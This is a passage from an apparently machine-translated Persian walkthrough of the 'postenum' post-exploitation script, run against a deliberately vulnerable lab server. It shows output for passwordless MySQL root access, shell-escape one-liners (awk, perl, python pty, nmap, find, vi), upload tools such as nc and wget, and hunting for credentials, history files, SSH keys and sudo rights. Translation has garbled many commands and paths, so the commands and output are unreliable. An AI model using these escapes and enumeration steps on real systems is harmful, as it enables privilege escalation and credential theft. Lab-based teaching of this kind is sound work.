348K -rwxr-xr-x 1 root root 341K Mar 9 2010 /usr/sbin/apache2 16K -rwxr-xr-x 1 root root 16K Feb 20 سال 2007 /usr/sbin/atd 32K -rwxr-xr-x 1 root root 31K May 8 2008 /usr/sbin/cron
7.1 M -rwxr-xr-x 1 root root 7.1 M Mar 28 2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K May 9 2008 /usr/sbin/نام
952K -rwxr-xr-x 1 root root 948K Apr 28 2010 /usr/sbin/nmbd 36K -rwxr-xr-x 1 root root 35K Dec 2 2008 /usr/sbin/rpc.idmapd 76K -rwxr-xr-x 1 root root 72K Dec 2 2008 /usr/sbin/rpc.mountd
3.0 M -rwxr-xr-x 1 root root 3.0 M Apr 28 2010 /usr/sbin/smbd
368K -rwxr-xr-x 1 root root 363K May 6 2008 /usr/sbin/, sshd,
140K -rwxr-xr-x 1 root root 135K Dec 3 2007 /usr/sbin/xinetd [x] نمایش هر فرآیند در حال اجرا توسط root در سیستم:
ریشه 1 0.1 0.6 2844 1696 ? اس اس 13:20 0:01 /sbin/init
ریشه 2 0.0 0.0 0 0 ? S< 13:20 0:00 [kthreadd]
ریشه 3 0.0 0.0 0 0 ? S< 13:20 0:00 [مهاجرت/0]
ریشه 4 0.0 0.0 0 0 ? S< 13:20 0:00 [ksoftirqd/0]
ریشه 5 0.0 0.0 0 0 ? S< 13:20 0:00 [watchdog/0]
ریشه 6 0.0 0.0 0 0 ? S< 13:20 0:00 [حوادث/0]
ریشه 7 0.0 0.0 0 0 ? S< 13:20 0:00 [khelper]
ریشه 41 0.0 0.0 0 0 ? S< 13:20 0:00 [kblockd/0]
ریشه 44 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpid]
ریشه 45 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpi_notify]
ریشه 88 0.0 0.0 0 0 ? S< 13:20 0:00 [kseriod]
ریشه 125 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
ریشه 126 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
ریشه 127 0.0 0.0 0 0 ? S< 13:20 0:00 [kswapd0]
ریشه 169 0.0 0.0 0 0 ? S< 13:20 0:00 [aio/0]
ریشه 1125 0.0 0.0 0 0 ? S< 13:20 0:00 [ksnapd]
ریشه 1316 0.0 0.0 0 0 ? S< 13:20 0:00 [ata/0]
ریشه 1318 0.0 0.0 0 0 ? S< 13:20 0:00 [ata_aux]
ریشه 1327 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_0]
ریشه 1340 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_1]
ریشه 1345 0.0 0.0 0 0 ? S< 13:20 0:00 [ksuspend_usbd]
ریشه 1353 0.0 0.0 0 0 ? S< 13:20 0:00 [khubd]
ریشه 1771 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_2]
ریشه 2295 0.0 0.0 0 0 ? S< 13:20 0:00 [kjournald]
ریشه 2460 0.0 0.2 2216 652 ? S<s 13:20 0:01 /sbin/udevd --daemon
ریشه 2706 0.0 0.0 0 0 ? S< 13:20 0:00 [kpsmoused]
ریشه 3588 0.0 0.0 0 0 ? S< 13:21 0:00 [kjournald]
ریشه 3743 0.0 0.0 0 0 ? S< 13:21 0:00 [rpciod/0]
ریشه 3758 0.0 0.2 3648 564 ? اس اس 13:21 0:00 /usr/sbin/rpc.idmapd
ریشه 3985 0.0 0.1 1716 488 tty4 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty4
ریشه 3986 0.0 0.1 1716 492 tty5 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty5
ریشه 3990 0.0 0.1 1716 488 tty2 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty2
ریشه 3993 0.0 0.1 1716 492 tty3 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty3
ریشه 3996 0.0 0.1 1716 488 tty6 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty6
ریشه 4069 0.0 0.2 1872 540 ? S 13:21 0:00 /bin/dd bs 1 اگر /proc/kmsg از /var/run/klogd/kmsg
ریشه 4116 0.0 0.3 5312 996 ? اس اس 13:21 0:00 /usr/sbin/, sshd,
ریشه 4193 0.0 0.5 2768 1304 ? S 13:21 0:00 /bin/sh /usr/bin/mysqld_safe
ریشه 4236 0.0 0.2 1700 556 ? S 13:21 0:00 چوب -p daemon.err -t mysqld_safe -i-t mysqld
ریشه 4399 0.0 0.0 0 0 ? S 13:21 0:00 [lockd]
ریشه 4400 0.0 0.0 0 0 ? S< 13:21 0:00 [nfsd4]
ریشه 4401 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4402 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4403 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4404 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4405 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4406 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4407 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4408 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4412 0.0 0.1 2424 332 ? اس اس 13:21 0:00 /usr/sbin/rpc.mountd
ریشه 4480 0.0 0.6 5412 1728 ? اس اس 13:21 0:00 /usr/lib/postfix/استاد
ریشه 4487 0.0 0.4 5388 1204 ? اس اس 13:21 0:00 /usr/sbin/nmbd -D
ریشه 4489 0.0 0.5 7724 1364 ? اس اس 13:21 0:00 /usr/sbin/smbd -D
ریشه 4493 0.0 0.3 7724 812 ? S 13:21 0:00 /usr/sbin/smbd -D
ریشه 4508 0.0 0.3 2424 856 ? اس اس 13:21 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
ریشه 4570 0.0 0.3 2104 896 ? اس اس 13:21 0:00 /usr/sbin/cron
ریشه 4598 0.0 0.1 2052 348 ? اس اس 13:21 0:00 /usr/bin/jsvc -کاربر tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.بی سر=true-Xmx128M -Djava.تایید شده.dirs=/usr/share/tomcat5.5/common/تایید -Dcatalina.پایه=/var/lib/tomcat5.5-Dcatalina.صفحه اصلی=/usr/share/tomcat5.5-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.امنیتی است.مدیر -Djava.امنیتی است.سیاست=/var/lib/tomcat5.5/conf/کاتالینا.سیاست org.آپاچی.کاتالینا.هنگام راه اندازی.بوت استرپ
ریشه 4599 0.0 0.1 2052 476 ? S 13:21 0:00 /usr/bin/jsvc -کاربر tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.بی سر=true-Xmx128M -Djava.تایید شده.dirs=/usr/share/tomcat5.5/common/تایید -Dcatalina.پایه=/var/lib/tomcat5.5-Dcatalina.صفحه اصلی=/usr/share/tomcat5.5-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.امنیتی است.مدیر -Djava.امنیتی است.سیاست=/var/lib/tomcat5.5/conf/کاتالینا.سیاست org.آپاچی.کاتالینا.هنگام راه اندازی.بوت استرپ
ریشه 4619 0.0 1.0 10596 2564 ? اس اس 13:21 0:00 /usr/sbin/apache2 -k شروع
ریشه 4638 0.0 10.3 66344 26472 ? Sl 13:21 0:00 /usr/bin/rmiregistry
ریشه 4642 0.5 1.0 12208 2568 ? Sl 13:21 0:08 روبی /usr/sbin/druby_timeserver.rb
ریشه 4649 0.0 0.1 1716 488 tty1 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty1
ریشه 4657 0.0 0.9 8540 2372 ? S 13:21 0:01 /usr/bin/unrealircd
ریشه 4659 0.3 4.7 14036 12016 ? S 13:21 0:04 Xtightvnc :0-desktop X -auth /root/.Xauthority -هندسه 1024x768 -عمق 24-rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
ریشه 4664 0.0 0.4 2724 1188 ? S 13:21 0:00 /bin/sh /root/.vnc/xstartup
ریشه 4667 0.0 1.0 5936 2572 ? S 13:21 0:00 xterm -هندسه 80x24+10+10 -ls -عنوان X دسکتاپ
ریشه 4670 0.3 1.9 8988 5000 ? S 13:21 0:05 fluxbox
ریشه 4704 0.0 0.6 2852 1544 pts/0 اس اس+ 13:22 0:00-باش [x] است mysql در حال اجرا توسط ریشه:
ریشه 4193 0.0 0.5 2768 1304 ? S 13:21 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 4235 0.1 6.6 127560 17036 ? Sl 13:21 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid file=/var/run/mysqld/mysqld.pid --skip-خارجی-قفل --port=3306 --سوکت=/var/run/mysqld/mysqld.جوراب
ریشه 4236 0.0 0.2 1700 556 ? S 13:21 0:00 چوب -p daemon.err -t mysqld_safe -i-t mysqld
www-data 4969 0.0 0.2 1784 540 امتیاز/1 R+ 13:44 0:00 grep mysql

آن را تلاش برای قرار دادن هر گونه cron jobs در مشترک دایرکتوری به عنوان به خوبی به عنوان هر ریشه. من را نیز به ما محتویات crontab است که یک لیست به طور منظم به اجرای دستورات مورد استفاده توسط مدیر. ما می توانید ببینید در حال اجرا خدمات از جمله کسانی که در حال اجرا به عنوان ریشه و یک بررسی در صورتی که MySQL روند در حال حاضر و در حال اجرا به عنوان ریشه.

فاز 4: اعتبار پایگاه داده

گزینه بعدی ما پوشش سعی خواهد کرد برای اتصال به MySQL و ورود به سیستم — استفاده از -t سوئیچ برای انجام این کار:

هدف:/var/tmp$ ./postenum.sh -t -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum [-] تلاش دسترسی
[+] - بررسی برخی از روش های برای استخراج اطلاعات کاربری و دسترسی به ریشه
[x] اتصال به MYSQL به عنوان ریشه و غیر عبور:
[/] ما می توانیم اتصال به MYSQL محلی خدمات به عنوان 'root و بدون رمز عبور!
mysqladmin نسخه 8.41 Distrib 5.0.51 a برای دبیان-linux-gnu در i486
کپی رایت (C) 2000-2006 MySQL AB
این نرم افزار همراه با کاملا بدون گارانتی. این نرم افزار رایگان,
و شما در حال خوش آمدید به تغییر و توزیع مجدد آن را تحت مجوز GPL نسخه سرور 5.0.51 a-3ubuntu5
نسخه پروتکل 10
اتصال به Localhost از طریق سوکت یونیکس
یونیکس سوکت /var/run/mysqld/mysqld.جوراب
آپ تایم: 25 دقیقه 31 ثانیه تاپیک: 2 سوال: 446 نمایش داده شد آهسته: 0 باز می شود: 420 خیط و پیت کردن جداول: 1 جدول باز: 64 نمایش داده شد در هر ثانیه avg: 0.291

ما می توانید ببینید که آن را قادر به اتصال به پایگاه داده به عنوان root و بدون رمز عبور. سپس آن ها را به ما می دهد برخی از اطلاعات نسخه, اتصال داده و آپ تایم.

فاز 5: توسعه ابزار و پوسته فرار

گزینه بعدی ما را پوشش خواهد به دنبال توسعه مشترک ابزار بر روی سیستم است که می تواند اغلب مورد آزار قرار گرفته و منجر به privilege escalation. آن را نیز امتحان کنید برخی از رایج پوسته فرار اگر محدود پوسته در حال حاضر. استفاده از -l گزینه برای این کار:

هدف:/var/tmp$ ./postenum.sh -l -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum [-] توسعه ابزارها و زبان ها
[+] - بررسی توسعه ابزارها و زبان های نصب شده/پشتیبانی
/usr/bin/python
/usr/bin/perl
/usr/bin/php
/usr/bin/شورای همکاری خلیج فارس
/usr/bin/cc
/usr/bin/nmap [+] - برای چک کردن چگونه فایل ها را می توان آپلود
/usr/bin/ftp
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/curl [+] - پوسته فرار
awk = awk 'BEGIN {system("/bin/sh")}'
پرل = perl -e 'exec "/bin/sh";'
python = python -c 'واردات pty;pty.تخم ریزی("/bin/sh")'
php = php -r 'system("/bin/sh");'
روبی = ruby-e 'exec "/bin/sh"'
کمتر = !sh
بیشتر = !sh
مرد = !sh
nmap = --تعاملی
nmap = echo "سیستم عامل.execute('/bin/sh')" > /tmp/پوسته.nse
پیدا کردن = find / -exec /usr/bin/awk 'BEGIN {system("/bin/sh")}' \;
پیدا کردن = find / -exec sh -i \;
vi = :!sh یا :پوسته یا -c '!sh'
vim = :!sh یا :پوسته یا -c '!sh'
gdb = پوسته [ + ] لیست تمام متغیر های محیط زیست
SERVER_SIGNATURE=<address>Apache/2.2.8 (اوبونتو) DAV/2 Server at 10.10.0.50 پورت 80</address> ORIG_PATH_TRANSLATED=/var/www/dvwa/vulnerabilities/exec/index.php
مدت=xterm
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
HTTP_HOST=10.10.0.50
SERVER_PORT=80
REDIRECT_HANDLER=php5-cgi
DOCUMENT_ROOT=/var/www/
SCRIPT_FILENAME=/var/www/dvwa/vulnerabilities/exec/index.php
REQUEST_URI=/dvwa/آسیب پذیری/exec/
SCRIPT_NAME=/dvwa/vulnerabilities/exec/index.php
HTTP_CONNECTION=keep-alive
REMOTE_PORT=38016
PATH=/usr/local/bin:/usr/bin:/bin
ORIG_SCRIPT_FILENAME=/usr/lib/cgi-bin/php
SERVER_ADMIN=مدیر سایت@localhost
PWD=/var/tmp
REDIRECT_STATUS=200
HTTP_ACCEPT_LANGUAGE=en-US en;q=0.5
HTTP_REFERER=http://10.10.0.50/dvwa/آسیب پذیری/exec/
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_DNT=1
ORIG_SCRIPT_NAME=/cgi-bin/php
REMOTE_ADDR=10.10.0.1
SERVER_NAME=10.10.0.50
SHLVL=4
CONTENT_LENGTH=68
SERVER_SOFTWARE=آپاچی/2.2.8 (اوبونتو) DAV/2
QUERY_STRING=
SERVER_ADDR=10.10.0.50
GATEWAY_INTERFACE=CGI/1.1
HTTP_UPGRADE_INSECURE_REQUESTS=1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip جلوگیری از تورم
CONTENT_TYPE=application/x-www-form-urlencoded
REDIRECT_URL=/dvwa/vulnerabilities/exec/index.php
HTTP_COOKIE=امنیت=low; PHPSESSID=c7e9261b3015fccc2d7518ea95244d5e
REQUEST_METHOD=پست
ORIG_PATH_INFO=/dvwa/vulnerabilities/exec/index.php
_=/usr/bin/printenv [ + ] لیست تمام در دسترس پوسته
# /etc/shells: معتبر ورود پوسته
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/داش
/bin/bash
/bin/rbash
/usr/bin/صفحه نمایش

ما می توانید ببینید که آن را می یابد و برخی از ابزار توسعه تمدن و زبان هایی مانند Python, PHP و Nmap, در میان دیگران. آن را نیز چک برای ابزار است که می تواند مورد استفاده قرار گیرد برای آپلود فایل است که می تواند منجر به سازش بیشتر. سپس آن لیست برخی از پوسته فرار دستورات پس از متغیر های محیط زیست و در دسترس پوسته بر روی سیستم.

فاز 6: نسخه های نرم افزار

گزینه بعدی ما خواهد شد نگاه در تعیین خواهد شد و برخی از اطلاعات نسخه از نرم افزار های مشترک نصب شده بر روی هدف است. استفاده از -v سوئیچ برای انجام این کار:

هدف:/var/tmp$ ./postenum.sh -v -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum [-] نرم افزار نسخه
[+] - بررسی برنامه ها و خدمات نسخه
[x] Sudo نسخه (<= 1.8.20):
Sudo نسخه 1.6.9p10 [x] MYSQL version:
mysql نسخه 14.12 Distrib 5.0.51 a برای دبیان-linux-gnu (i486) با استفاده از readline 5.2 [x] PostgreSQL نسخه:
psql (PostgreSQL) 8.3.1
شامل پشتیبانی از خط فرمان در حال ویرایش [x] نسخه جاوا:
نسخه جاوا "1.5.0"
gij (گنو libgcj) نسخه 4.2.4 (اوبونتو 4.2.4-1ubuntu3) کپی رایت (C) 2007 Free Software Foundation, Inc.
این نرم افزار رایگان است; دیدن منبع برای کپی کردن شرایط. وجود ندارد
گارانتی; حتی برای خرید و فروش یا تناسب اندام برای یک هدف خاص.

این به ما می دهد این نرم افزار نسخه شماره Sudo, MySQL, PostgreSQL و جاوا.

مرحله 7: جالب فایل

گزینه بعدی تلاش خواهد کرد برای قرار دادن هر گونه جالب فایل های موجود بر روی سیستم است که به طور بالقوه می تواند مورد استفاده برای privilege escalation. استفاده از -c سوئیچ برای این یکی:

هدف:/var/tmp$ ./postenum.sh -c -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum [-] اطلاعات محرمانه و کاربر
[+] - چک لیست کاربران و کاربران فوق العاده
[x] Super user:
ریشه:x:0:0:ریشه:/root:/bin/bash
ریشه [x] مفید کاربران خانگی:
drwxr-xr-x 2 ریشه nogroup 4096 May 17 2010 /home/ftp
drwxr-xr-x 5 msfadmin msfadmin 4096 16 ژوئن 2018 /صفحه اصلی/msfadmin
drwxr-xr-x 2 خدمات سرویس 4096 May 16 2010 /صفحه اصلی/خدمات
drwxr-xr-x 3 کاربر 4096 May 7 2010 /home/user [x] هر چیزی را با /bin/bash /bin/sh /bin/dash:
ریشه:x:0:0:ریشه:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
بن:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
بازی:x:5:60:بازی ها:/usr/games:/bin/sh
مرد:x:6:12:مرد:/var/cache/مرد:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
پست الکترونیکی:x:8:8:ایمیل:/var/ایمیل:/bin/sh
اخبار:x:9:9:اخبار:/var/spool/اخبار/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
پروکسی:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
پشتیبان:x:34:34:پشتیبان:/var/پشتیبان گیری:/bin/sh
فهرست:x:38:38:Mailing List Manager:/var/لیست:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats اشکال-سیستم گزارش دهی (مدیریت):/var/lib/gnats:/bin/sh
هیچ کس:x:65534:65534:هیچ کس:/ندارد:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/خانه/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL, مدیر,,,:/var/lib/mysql:/bin/bash
کاربر:x:1001:1001:فقط یک کاربر 111,,:/home/user:/bin/bash
خدمات:x:1002:1002:,,,:/صفحه اصلی/سرویس:/bin/bash [+] - اتمام /و غیره به صورت فایل های پیکربندی (بازگشتی سطح 1)
[x] همه *.conf فایل ها در /etc (بازگشتی 1 سطح):
-rw-r--r-- 1 root root 552 May 9 2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 6 Nov 2007 /etc/gssapi_mech.conf
-rw-r----- 1 ریشه فیوز 216 Feb 26 2008 /etc/فیوز.conf
-rw-r--r-- 1 root root 2405 Mar 13 2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 May 4 2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 20 مه 2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16 2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11 2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20 سال 2007 /و غیره/میزبان.conf
-rw-r--r-- 1 root root 13144 16 Nov 2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 20 مه 2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16 2010 /etc/ld.بنابراین.conf
-rw-r--r-- 1 root root 599 Jun 17 2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar 5 2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 20 مه 2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20 سال 2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar 8 2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 41 Jul 5 سال 2018 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18 سال 2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28 2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16 2010 /etc/محبوبیت مسابقه.conf
-rw-r--r-- 1 root root 417 Mar 27 2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28 2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23 2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec 2 2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23 2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16 2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 4 مه 2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 20 مه 2012 /etc/xinetd.conf [x] Sudo مجوز
[/] ما می توانید اجرا کنید: sudo بدون تهیه رمز عبور:
طریقه استفاده: کد: sudo -h | K | k | L | l | V | v
طریقه استفاده: کد: sudo [-bEHPS] [-p اعلان] [-u username|#uid] [VAR=ارزش] {-i | -s | <command>}
طریقه استفاده: کد: sudo -e [-S] [-p اعلان] [-u username|#uid] فایل ... [+] - چک کردن فایل های حساس
-rw-r--r-- 1 root root 1581 May 13 2012 /etc/passwd
-rw-r----- 1 ریشه سایه 1207 May 13 2012 /etc/shadow
-rw-r--r-- 1 root root 886 Apr 16 2010 /etc/group
-r--r----- 1 ریشه ریشه 470 Mar 16 2010 /etc/sudoers [+] - چک کنید اگر چیزی جالب در ایمیل دایرکتوری
[x] جالب ایمیل در /var/mail:
-rw------- 1 msfadmin پست 0 Apr 28 2010 msfadmin
-rw------- 1 ریشه ایمیل 722 7 مه 2010 ریشه [x] به نظر می رسد /var/mail/ریشه وجود دارد - شما می توانید سعی کنید به آن را بخوانید:
./postenum.sh: خط 792: : command not found [+] - چک کنید اگر چیزی جالب در خانه/دایرکتوری ریشه
[x] چک کنید اگر /ریشه قابل دسترس است:
[/] دایرکتوری ریشه را می توان در دسترس
drwxr-xr-x 2 ریشه ریشه 4.0 K 20 مه 2012 دسکتاپ
-rwx------ 1 ریشه ریشه 401 20 مه 2012 reset_logs.sh
-rw-r--r-- 1 root root 138 Jun 19 13:21 vnc.ورود به سیستم [x] جالب /home/* دایرکتوری:
drwxr-xr-x 2 ریشه nogroup 4.0 K Mar 17 2010 ftp
drwxr-xr-x 5 msfadmin msfadmin 4.0 K Jun 6 2018 msfadmin
drwxr-xr-x 2 سرویس خدمات 4.0 K Apr 16 سال 2010 خدمات
drwxr-xr-x 3 کاربر 4.0 K 7 مه 2010 کاربر [x] تاریخچه فایل /home/*/:
lrwxrwxrwx 1 root root 9 May 14 2012 /صفحه اصلی/msfadmin/.bash_history -> /dev/null
-rw------- 1 ریشه ریشه 4.1 K May 14 2012 /صفحه اصلی/msfadmin/.mysql_history
-rw------- 1 کاربر 165 7 مه 2010 /home/user/.bash_history [x] تاریخچه فایل /root:
-rw-r--r-- 1 root root 173 Jun 18 سال 2020 /root/.bash_history
-rw------- 1 ریشه ریشه 215 Jun 18 13:46 /root/.mysql_history [+] - بررسی متن ساده رمز عبور
[x] ~/.bash_history - قطعه زیر:
صادرات مدت=xterm-256color
صادرات پوسته=باش
stty ردیف 56 ستون 213
ls
صادرات مدت=xterm
ls
gfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ls
ls -la
cd /tmp/ ~/.nano_history فایل وجود ندارد:
~/.mysql_history فایل وجود ندارد
~/.php_history فایل وجود ندارد [+] - چک SSH Dir/فایل
[x] هر private-key info - /home/*/.ssh/:
drwx------ 2 msfadmin msfadmin 4096 May 17 2010 /صفحه اصلی/msfadmin/.ssh drwx------ 2 کاربر 4096 May 7 2010 /home/user/.ssh [x] هر private-key info - /root/.ssh/:
drwxr-xr-x 2 root root 4096 May 20 2012 /root/.ssh/
ls: cannot open directory /home/user/.ssh: Permission denied
[خواندن] چک کنید اگر PermitRootLogin است:
[/] ریشه مجاز به ورود از طریق SSH
بله [+] - بررسی سیاست رمز عبور اطلاعات و Umask ارزش
[x] سیاست رمز عبور:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7 [x] زمان umask ارزش:
0022
u=rwx g=rx,o=rx [+] - در دسترس است .rhosts فایل
[x] Rhost config file(s):
-rwx------ 1 msfadmin msfadmin 4 مارس 20 2012 /صفحه اصلی/msfadmin/.rhosts

آن را به ما می دهد یک لیست از superusers و کاربران به دنبال هر چیزی از /etc/passwd که دارای یک پوسته. بعد از آن به نظر می رسد برای پیکربندی های مختلف, فایل های, فایل های حساس و چه sudo مجوز هستند. سپس آن را چک برای ایمیل و دیگر جالب فایل ها در صفحه اصلی و ریشه دایرکتوری ها. در نهایت آن را به ما باش, تاریخ, سیاست رمز عبور اطلاعات و هر کلید خصوصی برای SSH.

مرحله 8: فایل های دیگر و مهم بیت

گزینه بعدی ما پوشش را به ما بدهد SUID و SGID اطلاعات مربوط به فایل سیستم. این نوع فایل ها می تواند اغلب مورد آزار قرار گرفته برای privilege escalation که بد باشد. آن را نیز برای چک کردن فایل های مخفی و یا هر گونه دیگر مفید بیت از اطلاعات — با استفاده از -s سوئیچ برای استفاده از این:

هدف:/var/tmp$ ./postenum.sh -s -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum [-] فایل سیستم
[+] - چک کنید اگر چیزی جالب در www directory
[x] هر جالب فایل/پوشه /var:
drwxr-xr-x 2 ریشه ریشه 4.0 K 8 مه 2010 پشتیبان گیری
drwxr-xr-x 12 root root 4.0 K Apr 28 2010 کش
drwxr-xr-x 37 ریشه ریشه 4.0 K 20 مه 2012 lib
drwxrwsr-x 2 ریشه کارکنان 4.0 K Apr 15 سال 2008 محلی
drwxrwxrwt 3 root root 60 Jun 19 13:21 قفل
drwxr-xr-x 14 ریشه ریشه 4.0 K Jun 19 13:21 ورود به سیستم
drwxrwsr-x 2 ریشه ایمیل 4.0 K 7 مه 2010 پست
drwxr-xr-x 2 ریشه ریشه 4.0 K Mar 16 سال 2010 انتخاب کردن
drwxr-xr-x 14 ریشه ریشه 580 Jun 19 13:21 اجرا
drwxr-xr-x 5 root root 4.0 K Apr 28 2010 قرقره
drwxrwxrwt 2 ریشه ریشه 4.0 K Jun 19 13:35 tmp
drwxr-xr-x 10 www-data www-data 4.0 K Aug 8 سال 2018 www [x] هر جالب فایل/پوشه /var/www:
drwxrwxrwt 3 root root 4.0 K Jun 19 2019 dav
drwxr-xr-x 8 www-data www-data 4.0 K 20 مه 2012 dvwa
-rw-r--r-- 1 www-data www-data 891 20 مه 2012 index.php
drwxr-xr-x 10 www-data www-data 4.0 K 14 مه 2012 mutillidae
drwxr-xr-x 11 www-data www-data 4.0 K 14 مه 2012 phpMyAdmin
